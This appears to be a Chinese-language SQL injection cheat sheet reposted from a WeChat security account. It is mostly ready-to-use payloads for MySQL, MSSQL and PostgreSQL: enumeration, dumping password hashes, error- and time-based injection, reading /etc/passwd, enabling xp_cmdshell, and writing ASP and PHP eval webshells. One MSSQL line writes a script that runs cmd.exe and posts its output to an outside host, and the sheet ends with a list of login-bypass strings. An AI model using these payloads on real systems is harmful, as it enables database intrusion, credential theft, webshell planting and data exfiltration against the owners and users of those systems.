简介
SQL 注入(SQL injection)是发生于应用程序数据库层的安全漏洞。简而言之,攻击者在输入的字符串中夹带 SQL 指令;在设计不良的程序中,这些输入未经参数化或校验就被直接拼接进 SQL 语句,于是注入的指令被数据库服务器当作正常的 SQL 指令执行,导致数据遭到破坏或系统被入侵。
SQL 注入类型
回显型注入
基于整型注入
基于字符串注入
基于搜索型注入
盲注
基于错误型盲注
基于布尔型盲注
基于时间型盲注
特殊形式注入
宽字符注入
HTTP 头注入
referer 注入
host 注入
cookies 注入
伪静态注入
Base64 变形注入
系统命令注入
XML 外部实体注入攻击(XXE 攻击)
SQL 注入语句
下面收集各种数据库系统常用的注入语句。
MySQL
基本环境信息
# 获取版本号 SELECT @@version SELECT version() # 主机名,IP 地址 SELECT @@hostname; # 数据目录 SELECT @@datadir; # 用户名及密码 SELECT host, user, password FROM mysql.user; # 用户名 SELECT user(); SELECT system_user(); SELECT user FROM mysql.user; SELECT current_user;
用户权限相关
# 列举用户权限 SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; # 列举用户权限 SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv,Grant_priv,References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv,Repl_client_priv FROM mysql.user; # 列举数据库权限 SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; # 列举 columns_priv SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges;
列举数据库
# 当前库 SELECT database(); # 所有库 (Mysql > 5.0) SELECT schema_name FROM information_schema.schemata;
列举表名
# 常规 SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema' # 根据列名找表名 SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';
列举字段名
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
单条数据获取
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; SELECT host,user FROM user ORDER BY host LIMIT 0,1;
显错注入
# 方式 1 and (select 1 from (select count(*),concat(SQL 语句,floor(rand(0)*2))x from information_schema.tables group by x)a); # 方式 2 and (select count(*) from (select 1 union select null union select !1)x group by concat(SQL 语句,floor(rand(0)*2))); # 方式 3 and extractvalue(1, concat(0x5c, (SQL 语句))); # 方式 4 and 1=(updatexml(1,concat(0x5e24,(SQL 语句),0x5e24),1));
延时注入
SELECT BENCHMARK(1000000,MD5('A')); SELECT SLEEP(5); # >= 5.0.12
文件读写
# 读取文件,需要相关权限 UNION SELECT LOAD_FILE('/etc/passwd') # 写入文件,需要相关权限 SELECT * FROM mytable INTO dumpfile '/tmp/somefile' # 写入文件,需要相关权限 SELECT * FROM mytable INTO outfile '/tmp/somefile'
判断及字符串相关
# if 判断 SELECT if(1=1,'foo','bar'); #返回 foo # CASE WHEN 判断 SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # 返回 A # char 函数,将数字转变为字符 SELECT char(65); #返回 A # ascii 函数,将字符转变为数字 SELECT ascii('A'); #返回 65 # CONCAT 函数,将字符连接在一起 SELECT CONCAT('A','B'); #returns AB # 字符串的 16 进制写法 SELECT 0×414243; # 返回 ABC # substring/substr 函数 SELECT substr('abcd', 3, 1); #返回 c # length 函数 SELECT length('abcd'); #返回 4
MSSQL
基本环境信息
# 数据库版本 SELECT @@version # 主机名,IP 地址 SELECT HOST_NAME() # 当前用户 SELECT user_name(); SELECT system_user; SELECT user; SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID # 列出所有用户 SELECT name FROM master..syslogins # 列密码 MSSQL 2000 SELECT name, password FROM master..sysxlogins --* SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins --* # 列密码 MSSQL 2005 SELECT name, password_hash FROM master.sys.sql_logins --* SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins --*
列举数据库
# 当前库 SELECT DB_NAME() # 列举库 SELECT name FROM master..sysdatabases; SELECT DB_NAME(N); — 其中 N = 0, 1, 2,
列举表名
# 列举表 SELECT name FROM 库名..sysobjects WHERE xtype = 'U'; # 根据字段名列表名 SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM 库名..sysobjects JOIN 库名..syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%字段名%'
列举字段名
# 列举当前库中的表的字段 SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = '表名'); # 列举 master 库中的表的字段 SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='表名';
单条数据获取
# 获取第 XXX 条数据 SELECT TOP 1 name FROM (SELECT TOP XXX name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC
权限相关
# 判断当前用户权限 SELECT is_srvrolemember('sysadmin'); SELECT is_srvrolemember('dbcreator'); SELECT is_srvrolemember('bulkadmin'); SELECT is_srvrolemember('diskadmin'); SELECT is_srvrolemember('processadmin'); SELECT is_srvrolemember('serveradmin'); SELECT is_srvrolemember('setupadmin'); SELECT is_srvrolemember('securityadmin'); # 判断某指定用户的权限 SELECT is_srvrolemember('sysadmin', 'sa'); # 判断是否是库权限 and 1=(Select IS_MEMBER('db_owner')) # 判断是否有库读取权限 and 1= (Select HAS_DBACCESS('master')) # 获取具有某个权限的用户名 SELECT name FROM master..syslogins WHERE denylogin = 0; SELECT name FROM master..syslogins WHERE hasaccess = 1; SELECT name FROM master..syslogins WHERE isntname = 0; SELECT name FROM master..syslogins WHERE isntgroup = 0; SELECT name FROM master..syslogins WHERE sysadmin = 1; SELECT name FROM master..syslogins WHERE securityadmin = 1; SELECT name FROM master..syslogins WHERE serveradmin = 1; SELECT name FROM master..syslogins WHERE setupadmin = 1; SELECT name FROM master..syslogins WHERE processadmin = 1; SELECT name FROM master..syslogins WHERE diskadmin = 1; SELECT name FROM master..syslogins WHERE dbcreator = 1; SELECT name FROM master..syslogins WHERE bulkadmin = 1; # 当前所拥有的权限 SELECT permission_name FROM master..fn_my_permissions(null, 'DATABASE'); — current database SELECT permission_name FROM master..fn_my_permissions(null, 'SERVER'); — current server SELECT permission_name FROM master..fn_my_permissions('master..syslogins', 'OBJECT'); –permissions on a table SELECT permission_name FROM master..fn_my_permissions('sa', 'USER');
显错注入
# 直接与数字比较 id=1 and @@version>0-- id=1 and user>0-- id=1 and db_name()>0-- # 将数据转换成整数致报错,可用于爆库名,表名,数据名 id=1 and 1=convert(int,(select name from master.dbo.sysdatabases where dbid=7))-- # having 1=1 爆数据 id=13 having 1=1 -- id=13 group by 表名.字段名1,字段名2 having 1=1 --
延时注入
# 延时 3 秒 IF(ascii(SUBSTRING('name',1,1))>0) waitfor delay'0:0:3'
命令执行
# 判断功能是否存在 and select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_regread') #注册表 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'sp_makewebtask') #备份 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'sp_addextendedproc') #恢复扩展 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_subdirs') #读取子目录 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_dirtree') #列目录 # 恢复与删除扩展 exec sp_addextendedproc xp_cmdshell,'xplog70.dll' exec sp_dropextendedproc 'xp_cmdshell'
# 恢复 xp_cmdshell EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'show advanced options', 0 -- # 访问 COM 组件 ;declare @s int; ;exec sp_oacreat 'wscript.shell',@s ;exec master..spoamethod @s,'run',null,'cmd.exe/c dir c: # 执行命令 EXEC xp_cmdshell 'net user'; # 写注册表 exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEMCurrentControlSetControlTerminal Server','fDenyTSConnections','REG_DWORD',0;-- # 读注册表 create table labeng(lala nvarchar(255), id int); DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEMControlSet001ServicesW3SVCParametersVirtual Roots','/',@result output insert into labeng(lala) values(@result); #读网站目录 # 写 Shell exec master.dbo.xp_cmdshell 'echo ^<%eval request("o")%^> >E:wwwroot1.asp'; -- # 停掉或激活某个服务 exec master..xp_servicecontrol 'stop','schedule' exec master..xp_servicecontrol 'start','schedule' # 添加、删除、设置用户为DBA的操作 EXEC sp_addlogin 'user', 'pass'; EXEC sp_droplogin 'user'; EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin'; # 获取 DB 文件位置信息 EXEC sp_helpdb master; -- master.mdf 位置
文件读写
# 文件读取 (创建临时表,bulk insert 读取内容到表) CREATE TABLE mydata (line varchar(8000)); BULK INSERT mydata FROM 'c:boot.ini'; DROP TABLE mydata; # 文件读取 (创建临时表,insert & xp_cmdshell 读取内容) create table mytmp(data varchar(4000)); -- insert mytmp exec master.dbo.xp_cmdshell 'ipconfig /all'; -- # 页面无回显时,读取命令执行内容 (需目标机器可连外网) (先写入 JavaScrip,然后通过执行 JavaScrip 将命令执行内容,通过 AJAX 发送给接收端) exec master.dbo.xp_cmdshell 'echo (function(){var ws=new ActiveXObject("WScript.shell"),cmd="cmd.exe /c dir c:\";var data=ws.exec(cmd).stdout.ReadAll();var ajax=new ActiveXObject("Microsoft.xmlhttp");ajax.open("POST","http://itsokla.duapp.com/cmd.php",false);ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");ajax.send("cmd="+encodeURIComponent(cmd)+"&data="+encodeURIComponent(encodeURIComponent(data)));})() > c:e.js' --
Oracle
待完善(敬请期待)
MongoDB
待完善(敬请期待)
PostgreSQL
显示版本
select version();
union select 1,2,...n,version()
//version()函数与MySQL的是一样的
从已知表段字段爆数据
select aa from bb where cc=dd;
union select 1,2,....n,aa from bb where cc=dd
//所有的SQL语法几乎都是这样的语法来爆数据
列库
select datname from pg_database;
union select 1,2,....,n,datname from pg_database;
列数据库中的表段
select relname from pg_stat_user_tables limit 1 offset n;
//类似于MySQL中的information_schema.tables,虽然不大恰当
union select relname from pg_stat_user_tables limit 1 offset 3;
//limit 1 offset 0和MySQL的limit 0,1一个效果。
列表段中的字段
select column_name from information_schema.columns where table_name='xxx' limit 1 offset n;
union select 1,2,.....,n,column_name from information_schema.columns where table_name=0x3a limit 1 offset 5
读取配置信息,例如数据库登陆账户和密码
select usename,passwd from pg_shadow;
union select 1,2,...n,usename,passwd from pg_shadow
//pg_shadow 是 PostgreSQL 的系统视图,作用类似于 MySQL 中的 mysql 库
读取文件
create table test(code text);
copy test from '/etc /passwd'with delimiter E't';
(注:网上多数关于 PostgreSQL 的语句中使用双引号,实际测试 8.x 到 9.x 双引号无效,应该使用单引号)
写入文件
insert into test values ('<?php eval($_POST["cmd"];?>');
copy test(code) to ”/var/www/one.php”;
Access
待完善(敬请期待)
Ingres
待完善(敬请期待)
IBM DB2
待完善(敬请期待)
IBM Informix
待完善(敬请期待)
SQL 注入后台万能密码
</nowiki> 'or'='or' 'or=''or ='" or "a"="a "or "a"="a "or 1=1-- "or 1=1%00 "or"="a'='a "or=or" ') or ('a'='a ')or('a'='a 1 or '1'='1' or 1=1 1 or '1'='1'=1 1'or'1'='1 admin' or 'a'='a 密码随便 admin'or'1'='1'-- admin' or '1'='1'-- a'or' 1=1-- a 'or' 1=1-- or 1=1-- 'or 1=1-- 'or' '1'='1 or 1=1-- ' 'OR 1=1%00 or 'a'='a 'or'='1' 'or=or='' or =or=''or'1'='1 ' or '1'='1 'or'a'='a ' or 'a'='a 'xor ' UNION Select 1,1,1 FROM admin Where ='</nowiki>
本文始发于微信公众号(飓风网络安全):SQL 注入大集合